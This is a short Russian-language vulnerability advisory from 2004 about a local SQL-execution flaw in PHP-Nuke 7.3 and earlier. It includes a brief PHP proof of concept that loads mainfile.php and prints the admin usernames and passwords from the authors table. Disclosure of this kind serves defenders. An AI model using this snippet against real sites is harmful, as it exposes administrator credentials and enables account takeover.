Дата публикации: | 02.06.2004 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 2756 |
Опасность: | Низкая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: PHP-Nuke 7.3 и более ранние версии
Описание: Уязвимость обнаружена в PHP-Nuke. Локальный пользователь может выполнить произвольные SQL запросы на основной базе данных. Локальный пользователь может создать PHP код, который заставит 'mainfile.php' выполнить SQL запрос к PHP-Nuke базе данных. Необходимая информация подключения к базе данных представлена сценарием 'config.php' на системе. Пример: <?php require_once ("/location_of_victim's_PHPNuke/mainfile.php"); $sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors"); while($record = $db->sql_fetchrow($sql)) ~ echo "Username: $record[aid]\n<br>\nPassword: $record[pwd]\n<br><br>\n"; unset($sql); ?>Для того, чтобы этот эксплоит работал, локальный пользователь должен сперва создать символьную ссылку, которая ссылается директорию базы данных в PHP-Nuke домашнем каталоге. URL производителя: http://www.phpnuke.org/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | [Full-Disclosure] Possible bug in PHPNuke and other CMS |